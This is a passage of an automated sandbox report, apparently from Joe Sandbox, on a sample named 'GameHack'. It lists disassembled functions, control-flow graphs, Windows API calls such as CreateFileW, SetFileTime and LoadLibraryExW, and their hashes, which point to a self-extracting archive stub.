                                      • Instruction ID: 16c590909e7cac64ba9d41767b1a0c962a5cbf544b50b1a3ea48763305480fe0
                                      • Opcode Fuzzy Hash: 7a7a75b611660a70d136c78811cf4831633235530e421ce66d3bf4731876eb23
                                      • Instruction Fuzzy Hash: C451E3F271020AAFEB258F64CC41EBB77AAEB44754F195239FE08EA151DB35DC408661
                                      Function 00ED99B0 Relevance: 7.6, APIs: 5, Instructions: 117filetimeCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 935 ed99b0-ed99d1 call eee360 938 ed99dc 935->938 939 ed99d3-ed99d6 935->939 940 ed99de-ed99fb 938->940 939->938 941 ed99d8-ed99da 939->941 942 ed99fd 940->942 943 ed9a03-ed9a0d 940->943 941->940 942->943 944 ed9a0f 943->944 945 ed9a12-ed9a31 call ed70bf 943->945 944->945 948 ed9a39-ed9a57 CreateFileW 945->948 949 ed9a33 945->949 950 ed9a59-ed9a7b GetLastError call edb66c 948->950 951 ed9abb-ed9ac0 948->951 949->948 960 ed9a7d-ed9a9f CreateFileW GetLastError 950->960 961 ed9aaa-ed9aaf 950->961 952 ed9ae1-ed9af5 951->952 953 ed9ac2-ed9ac5 951->953 956 ed9af7-ed9b0f call edfe56 952->956 957 ed9b13-ed9b1e 952->957 953->952 955 ed9ac7-ed9adb SetFileTime 953->955 955->952 956->957 964 ed9aa5-ed9aa8 960->964 965 ed9aa1 960->965 961->951 962 ed9ab1 961->962 962->951 964->951 964->961 965->964
                                      APIs
                                      • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,?,00000000,?,00000000,?,?,00ED78AD,?,00000005,?,00000011), ref: 00ED9A4C
                                      • GetLastError.KERNEL32(?,?,00ED78AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00ED9A59
                                      • CreateFileW.KERNEL32(?,?,?,00000000,00000003,?,00000000,?,?,00000800,?,?,00ED78AD,?,00000005,?), ref: 00ED9A8E
                                      • GetLastError.KERNEL32(?,?,00ED78AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00ED9A96
                                      • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,00ED78AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00ED9ADB
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: File$CreateErrorLast$Time
                                      • String ID:
                                      • API String ID: 1999340476-0
                                      • Opcode ID: eb852364518915381c9b5ff0134489601eed06404baa71a3f4727a812b64396c
                                      • Instruction ID: 72ef4dc155b1e16b4fa1ab36081aff4fefeb8aaf3b9e589f6773d7921a0c2106
                                      • Opcode Fuzzy Hash: eb852364518915381c9b5ff0134489601eed06404baa71a3f4727a812b64396c
                                      • Instruction Fuzzy Hash: F04135315447466FE3209B20CC05BDABBD4FB05328F10171AF9E4A62D2E775A98ACB95
                                      Function 00EEAC74 Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 994 eeac74-eeac8d PeekMessageW 995 eeac8f-eeaca3 GetMessageW 994->995 996 eeacc8-eeaccc 994->996 997 eeacb4-eeacc2 TranslateMessage DispatchMessageW 995->997 998 eeaca5-eeacb2 IsDialogMessageW 995->998 997->996 998->996 998->997
                                      APIs
                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00EEAC85
                                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00EEAC96
                                      • IsDialogMessageW.USER32(00010486,?), ref: 00EEACAA
                                      • TranslateMessage.USER32(?), ref: 00EEACB8
                                      • DispatchMessageW.USER32(?), ref: 00EEACC2
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: Message$DialogDispatchPeekTranslate
                                      • String ID:
                                      • API String ID: 1266772231-0
                                      • Opcode ID: ef97efe3d6565f7e6cb9399bffd12727fbb7c3802b105018c748f59fd30a7b9e
                                      • Instruction ID: 102721dfbcb9c555197fbad5c3b6c8e5fc8ff2e0e0478fdd4df18165499bf181
                                      • Opcode Fuzzy Hash: ef97efe3d6565f7e6cb9399bffd12727fbb7c3802b105018c748f59fd30a7b9e
                                      • Instruction Fuzzy Hash: FAF030B1D0112DABCB649BE2EC4CDEFBF6DEE052A17444419F805D2110EB34E409DBB1
                                      Function 00EEA2C7 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 36COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 999 eea2c7-eea2e6 GetClassNameW 1000 eea30e-eea310 999->1000 1001 eea2e8-eea2fd call ee17ac 999->1001 1003 eea31b-eea31f 1000->1003 1004 eea312-eea315 SHAutoComplete 1000->1004 1006 eea2ff-eea30b FindWindowExW 1001->1006 1007 eea30d 1001->1007 1004->1003 1006->1007 1007->1000
                                      APIs
                                      • GetClassNameW.USER32(?,?,00000050), ref: 00EEA2DE
                                      • SHAutoComplete.SHLWAPI(?,00000010), ref: 00EEA315
                                        • Part of subcall function 00EE17AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,00EDBB05,00000000,.exe,?,?,00000800,?,?,00EE85DF,?), ref: 00EE17C2
                                      • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 00EEA305
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: AutoClassCompareCompleteFindNameStringWindow
                                      • String ID: EDIT
                                      • API String ID: 4243998846-3080729518
                                      • Opcode ID: 50a63cfd42d398293f62c4f92a4119d0f5b570fc00129492ddb4be725178f972
                                      • Instruction ID: b9add1e1ef51c73bac4e4a13ebfa2ec4efdd820f9a4a0893d3d6a3e34e66f4b3
                                      • Opcode Fuzzy Hash: 50a63cfd42d398293f62c4f92a4119d0f5b570fc00129492ddb4be725178f972
                                      • Instruction Fuzzy Hash: 1BF02772A0122C77E7305625AC09FDF73AC9F46B10F080066BE04F3180D760AD45D6F6
                                      Function 00EEA335 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35comCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                        • Part of subcall function 00EE0085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00EE00A0
                                        • Part of subcall function 00EE0085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00EDEB86,Crypt32.dll,00000000,00EDEC0A,?,?,00EDEBEC,?,?,?), ref: 00EE00C2
                                      • OleInitialize.OLE32(00000000), ref: 00EEA34E
                                      • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00EEA385
                                      • SHGetMalloc.SHELL32(00F18430), ref: 00EEA38F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
                                      • String ID: riched20.dll
                                      • API String ID: 3498096277-3360196438
                                      • Opcode ID: a3c05e673d011155fa1901af946028a4c5a8be94655f23824364d2b8f6c106e3
                                      • Instruction ID: d84d9343b2fab2b45e890cbb1f345dc6a35bb4d3b6e4754a00286c9fe30f0c04
                                      • Opcode Fuzzy Hash: a3c05e673d011155fa1901af946028a4c5a8be94655f23824364d2b8f6c106e3
                                      • Instruction Fuzzy Hash: F1F049B1C0020EABCB50AF9AD8499EFFBFCEF94311F00415AE914E2200DBB456499BA1
                                      Function 00EED287 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 32COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1012 eed287-eed2b2 call eee360 SetEnvironmentVariableW call edfbd8 1016 eed2b7-eed2bb 1012->1016 1017 eed2df-eed2e3 1016->1017 1018 eed2bd-eed2c1 1016->1018 1019 eed2ca-eed2d1 call edfcf1 1018->1019 1022 eed2c3-eed2c9 1019->1022 1023 eed2d3-eed2d9 SetEnvironmentVariableW 1019->1023 1022->1019 1023->1017
                                      APIs
                                      • SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 00EED29D
                                      • SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00EED2D9
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: EnvironmentVariable
                                      • String ID: sfxcmd$sfxpar
                                      • API String ID: 1431749950-3493335439
                                      • Opcode ID: fa9f478675b6c4553511439ef583a344762acf65a0a0e2216878f799beaf21cd
                                      • Instruction ID: ae4c570b96aee0e10655fc7c070b43d526fe15b0e23807955a39ed3ed827df78
                                      • Opcode Fuzzy Hash: fa9f478675b6c4553511439ef583a344762acf65a0a0e2216878f799beaf21cd
                                      • Instruction Fuzzy Hash: 6BF0A07280522CE6DB206F919C0ABFEBBACEF0DB41B005112FD85B6261D660CD40EAF1
                                      Function 00ED984E Relevance: 6.1, APIs: 4, Instructions: 57fileCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1024 ed984e-ed985a 1025 ed985c-ed9864 GetStdHandle 1024->1025 1026 ed9867-ed987e ReadFile 1024->1026 1025->1026 1027 ed98da 1026->1027 1028 ed9880-ed9889 call ed9989 1026->1028 1029 ed98dd-ed98e2 1027->1029 1032 ed988b-ed9893 1028->1032 1033 ed98a2-ed98a6 1028->1033 1032->1033 1034 ed9895 1032->1034 1035 ed98a8-ed98b1 GetLastError 1033->1035 1036 ed98b7-ed98bb 1033->1036 1039 ed9896-ed98a0 call ed984e 1034->1039 1035->1036 1040 ed98b3-ed98b5 1035->1040 1037 ed98bd-ed98c5 1036->1037 1038 ed98d5-ed98d8 1036->1038 1037->1038 1041 ed98c7-ed98d0 GetLastError 1037->1041 1038->1029 1039->1029 1040->1029 1041->1038 1043 ed98d2-ed98d3 1041->1043 1043->1039
                                      APIs
                                      • GetStdHandle.KERNEL32(000000F6), ref: 00ED985E
                                      • ReadFile.KERNELBASE(?,?,00000001,?,00000000), ref: 00ED9876
                                      • GetLastError.KERNEL32 ref: 00ED98A8
                                      • GetLastError.KERNEL32 ref: 00ED98C7
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: ErrorLast$FileHandleRead
                                      • String ID:
                                      • API String ID: 2244327787-0
                                      • Opcode ID: 586e8bb034be96cd84decfed1fc9d85d6eeeab6541da69dc49b06ed5a28e29ee
                                      • Instruction ID: 20c47a3c7c53842997a77570fd8e3ad00bf44e62becccaeaecec92f985c8ef78
                                      • Opcode Fuzzy Hash: 586e8bb034be96cd84decfed1fc9d85d6eeeab6541da69dc49b06ed5a28e29ee
                                      • Instruction Fuzzy Hash: 8A11A738900308EFDB285B51CC0466977ACFB02B38F10A12BF41AA6741D7759D42BF51
                                      Function 00EFA4F4 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00EDCFE0,00000000,00000000,?,00EFA49B,00EDCFE0,00000000,00000000,00000000,?,00EFA698,00000006,FlsSetValue), ref: 00EFA526
                                      • GetLastError.KERNEL32(?,00EFA49B,00EDCFE0,00000000,00000000,00000000,?,00EFA698,00000006,FlsSetValue,00F07348,00F07350,00000000,00000364,?,00EF9077), ref: 00EFA532
                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00EFA49B,00EDCFE0,00000000,00000000,00000000,?,00EFA698,00000006,FlsSetValue,00F07348,00F07350,00000000), ref: 00EFA540
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: LibraryLoad$ErrorLast
                                      • String ID:
                                      • API String ID: 3177248105-0
                                      • Opcode ID: e4e12ba9deb70722f4fac2d4e81efbf36ff8552be4904c2c3ca3328854d67c93
                                      • Instruction ID: 4c8864e6e4c7f2517466fb81ae76cc1559c4f6552b621d91f06dc4bc0b321559
                                      • Opcode Fuzzy Hash: e4e12ba9deb70722f4fac2d4e81efbf36ff8552be4904c2c3ca3328854d67c93
                                      • Instruction Fuzzy Hash: 050147B261122EABC7208B689C44AB67B5CBF05BA5B280134FE0EEB240D720D900C6E1
                                      Function 00ED9F2F Relevance: 4.6, APIs: 3, Instructions: 107fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetStdHandle.KERNEL32(000000F5,?,00000001,?,?,00EDCC94,00000001,?,?,?,00000000,00EE4ECD,?,?,?), ref: 00ED9F4C
                                      • WriteFile.KERNEL32(?,?,?,00000000,00000000,?,?,00000000,00EE4ECD,?,?,?,?,?,00EE4972,?), ref: 00ED9F8E
                                      • WriteFile.KERNELBASE(?,?,?,00000000,00000000,?,?,?,00000001,?,?,00EDCC94,00000001,?,?), ref: 00ED9FB8
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: FileWrite$Handle
                                      • String ID:
                                      • API String ID: 4209713984-0
                                      • Opcode ID: f782b4fa181bc8f9f30aceec79014fa70d6cd4cb18ef403e2abf3c2c858fabdf
                                      • Instruction ID: a0063e2c88f1dc1bd29c52d6a6897d9fe54f36e444d76f240903542a73065aab
                                      • Opcode Fuzzy Hash: f782b4fa181bc8f9f30aceec79014fa70d6cd4cb18ef403e2abf3c2c858fabdf
                                      • Instruction Fuzzy Hash: B131E2712083059BDF109F24DC48B7ABBA8FB50714F04566EF945AB382C775DD4ACBA2
                                      Function 00EDA207 Relevance: 4.6, APIs: 3, Instructions: 56COMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,00EDA113,?,00000001,00000000,?,?), ref: 00EDA22E
                                      • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,00EDA113,?,00000001,00000000,?,?), ref: 00EDA261
                                      • GetLastError.KERNEL32(?,?,?,?,00EDA113,?,00000001,00000000,?,?), ref: 00EDA27E
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: CreateDirectory$ErrorLast
                                      • String ID:
                                      • API String ID: 2485089472-0
                                      • Opcode ID: d677bdf461f40d22e3aa2680b6a4a76fffca0516505f89fc9a71638f00cbd846
                                      • Instruction ID: 0cb1e3a8b6131d4a5f9b325c2797e217cbb23c37d240e3406e9bf1b15ddcc3a3
                                      • Opcode Fuzzy Hash: d677bdf461f40d22e3aa2680b6a4a76fffca0516505f89fc9a71638f00cbd846
                                      • Instruction Fuzzy Hash: 4D01843118111865DB319B664C05BFA338CEF06755F0C5867F801F5261D755CB439663
                                      Function 00EFAFF4 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 00EFB019
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: Info
                                      • String ID:
                                      • API String ID: 1807457897-3916222277
                                      • Opcode ID: e5621a1b09a50fcea492b85f8a9b94e9c31f067e1f613195ab06c1f515b24485
                                      • Instruction ID: 73cfb2a907d68cffd8f048527af95c412483ca536a3586101c9d565ea883a2bf
                                      • Opcode Fuzzy Hash: e5621a1b09a50fcea492b85f8a9b94e9c31f067e1f613195ab06c1f515b24485
                                      • Instruction Fuzzy Hash: 7741197050438C9ADF218E24CC94BF7BBADEB45308F2414EDE69A97142D7359E45DF60
                                      Function 00EFA72C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,3FE85006,00000001,?,?), ref: 00EFA79D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: String
                                      • String ID: LCMapStringEx
                                      • API String ID: 2568140703-3893581201
                                      • Opcode ID: 7fbcb891a56737305be89bbc819277336d20f4bb103702de587f5bc0420e90ee
                                      • Instruction ID: 975afe7d8df2888e9ecfb146e185a8a3971fdd9b3d3460d65420d95e11deec68
                                      • Opcode Fuzzy Hash: 7fbcb891a56737305be89bbc819277336d20f4bb103702de587f5bc0420e90ee
                                      • Instruction Fuzzy Hash: DE01C27254421DBBCF126FA0DC05DAE7FA6EB08750F045165FE186A1A0CA729A21FB92
                                      Function 00EFA6CA Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMON
                                      Download Yara Rule
                                      APIs
                                      • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,00EF9D2F), ref: 00EFA715
                                      Strings
                                      • InitializeCriticalSectionEx, xrefs: 00EFA6E5
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: CountCriticalInitializeSectionSpin
                                      • String ID: InitializeCriticalSectionEx
                                      • API String ID: 2593887523-3084827643
                                      • Opcode ID: dc9f93257749c8c3cc6b29b57d399ffc25b705333b33975ce983a524c2bcd699
                                      • Instruction ID: 151b6deb7ea34d9cf5fbdc64c29183ddb73e3493f48b653816fa08a0f82a8085
                                      • Opcode Fuzzy Hash: dc9f93257749c8c3cc6b29b57d399ffc25b705333b33975ce983a524c2bcd699
                                      • Instruction Fuzzy Hash: 51F0E271A4521CBBCB117F60DC05CAE7FA5FF48720B049065FD092A2A0DA729E10FBA2
                                      Function 00EFA56F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: Alloc
                                      • String ID: FlsAlloc
                                      • API String ID: 2773662609-671089009
                                      • Opcode ID: f09a43f87be499589dec3ab23973f8544b333d1e9e64659b125c11348a12e333
                                      • Instruction ID: 03baae60bf334c14173701e6e23319bdec45d880e0ae0743a9aced14334c9fce
                                      • Opcode Fuzzy Hash: f09a43f87be499589dec3ab23973f8544b333d1e9e64659b125c11348a12e333
                                      • Instruction Fuzzy Hash: 77E0E5B0B4532C6BD2147B649C069BEBB94EB15B10B450165FD0D6B280DD719E00B6D6
